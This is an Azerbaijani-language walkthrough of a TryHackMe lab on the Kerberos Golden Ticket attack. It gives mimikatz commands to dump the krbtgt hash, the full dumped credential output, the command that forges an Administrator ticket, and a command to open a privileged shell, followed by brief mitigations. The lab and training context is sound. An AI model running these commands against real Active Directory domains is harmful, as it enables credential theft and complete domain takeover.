GOLDEN TİCKET | attack
Tryhackme saytında olan “Post-Exploitation Basics”otağında olan “Golden Ticket Attack”hissəsindən götürülmüşdür.
Zəifliyi olan virtual maşının BAĞLANTISI
Gəlin əvvəlcə “Golden Ticket”nedir ona bir baxaq.Əslində “Windows” üçün belə bir söz yoxdur.Bu, Kerberos autentifikasiyasından sui-istifadə edərək AD domenində istifadəçiləri təqlid etmək üçün məşhur bir texnikadır.Bildiyimiz kimi Windows-un iki məşhur autentifikasiyası var.NTLM və Kerberos.
Bir DC yaratdığımızda local istifadəçilər yaradılır bəziləri login belə ola bilmir.Administrator, Guest, and KRBTGT..
Hər istifadəçinin öz bənzərsiz bir id-si olur bəzən SysAdminlər local Administrator hesablarının adlarını dəyişdirərək bu hesabları qorumağa çalışırlar sadəcə unutmamaq lazımdır ki,SID-lər dəyişmir və buna session yaratdığımız hesabda görə bilərik.
Kerberos Doğrulama Prosesi ~
Active Directory domenində hər bir domen nəzarətçisi Kerberos-a bütün bilet sorğularını emal edən KDC (Kerberos Distribution Center) xidmətini idarə edir.Kerberos biletləri üçün AD,AD domenində KRBTGT hesabından istifadə edir. KRBTGT həm də Windows Server domeni üçün KDC tərəfindən istifadə edilən təhlükəsizlik əsas adıdır.
Əvvəlcə biz krbtgt istifadəçisinin hash və sid-ini tapacağıq,sonra “Golden Ticket” yaradacağıq və həmin “Golden Ticket”dən şəbəkədəki istənilən maşına daxil olmağa imkan verəcək yeni əmr paneli açmaq üçün istifadə edəcəyik.
“Golden Ticket” yaratmaq üçün aşağıdakı məlumatlar tələb olunur:
1.domen adı
2.Domenin SID-i
3.Domendəki istifadəçisinin NTLM hashı
“Kerberos Ticket Granting Ticket” hesabının hash və təhlükəsizlik identifikatorunu silməklə “Golden Ticket” yaratmağa imkan verir.
“Golden Ticket” yaratmaq üçün sizə lazım olanları “NOTE” görə bilərsiniz.
mimikatz # lsadump::lsa /inject /name:krbtgtDomain : CONTROLLER / S-1–5–21–849420856–2351964222–986696166 /NOTE
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf /NOTE
LM :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
lm — 0: 372f405db05d3cafd27f8e6a4a097b2c
* WDigest
01 49a8de3b6c7ae1ddf36aa868e68cd9ea
02 7902703149b131c57e5253fd9ea710d0
03 71288a6388fb28088a434d3705cc6f2a
04 49a8de3b6c7ae1ddf36aa868e68cd9ea
05 7902703149b131c57e5253fd9ea710d0
06 df5ad3cc1ff643663d85dabc81432a81
07 49a8de3b6c7ae1ddf36aa868e68cd9ea
08 a489809bd0f8e525f450fac01ea2054b
09 19e54fd00868c3b0b35b5e0926934c99
10 4462ea84c5537142029ea1b354cd25fa
11 6773fcbf03fd29e51720f2c5087cb81c
12 19e54fd00868c3b0b35b5e0926934c99
13 52902abbeec1f1d3b46a7bd5adab3b57
14 6773fcbf03fd29e51720f2c5087cb81c
15 8f2593c344922717d05d537487a1336d
16 49c009813995b032cc1f1a181eaadee4
17 8552f561e937ad7c13a0dca4e9b0b25a
18 cc18f1d9a1f4d28b58a063f69fa54f27
19 12ae8a0629634a31aa63d6f422a14953
20 b6392b0471c53dd2379dcc570816ba10
21 7ab113cb39aa4be369710f6926b68094
22 7ab113cb39aa4be369710f6926b68094
23 e38f8bc728b21b85602231dba189c5be
24 4700657dde6382cd7b990fb042b00f9e
25 8f46d9db219cbd64fb61ba4fdb1c9ba7
26 36b6a21f031bf361ce38d4d8ad39ee0f
27 e69385ee50f9d3e105f50c61c53e718e
28 ca006400aefe845da46b137b5b50f371
29 15a607251e3a2973a843e09c008c32e3* Kerberos
Default Salt : CONTROLLER.LOCALkrbtgt
Credentials
des_cbc_md5 : 64ef5d43922f3b5d* Kerberos-Newer-Keys
Default Salt : CONTROLLER.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
aes128_hmac (4096) : 7eb35bddd529c0614e5ad9db4c798066
des_cbc_md5 (4096) : 64ef5d43922f3b5d* NTLM-Strong-NTOWF
Random Value : 666caaaaf30081f30211bd7fa445fec4
“Golden Ticket” yaratmaq üçün əmr.
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1–5–21–849420856–2351964222–98669616
6 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500User : Administrator
Domain : controller.local (CONTROLLER)
SID : S-1–5–21–849420856–2351964222–986696166
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf — rc4_hmac_nt
Lifetime : 11/23/2021 2:49:02 AM ; 11/21/2031 2:49:02 AM ; 11/21/2031 2:49:02 AM
-> Ticket : ticket.kirbi* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generatedFinal Ticket Saved to file !
Bu əmr bizə, bütün maşınlar üçün yüksək imtiyazları olan yeni bir əmr prosesi açacaq.
misc::cmdTədbirlər:
Domendəki kritik obyektlərin (məsələn, Domain Controller maşınları, Domain Admins və ya Enterprise Admins qrup üzvləri və s.) hücum zamanı təhlükəsiz olması çox vacibdir.
Hücum baş veribsə, istifadəçi parolu sıfırlanmalıdır.
Antivirus + EDR + Zərərli proqram aşkar edən istifadə edin.
Audit qeydlərinin düzgün konfiqurasiya edildiyinə və aktiv olduğuna əmin olun.
Azure ATP istifadə edin.Bu, şəbəkələrinizdə təhlükəsizlik insidentlərini aşkar etməyə və araşdırmanıza kömək edən bulud əsaslı təhlükəsizlik həllidir.
references:
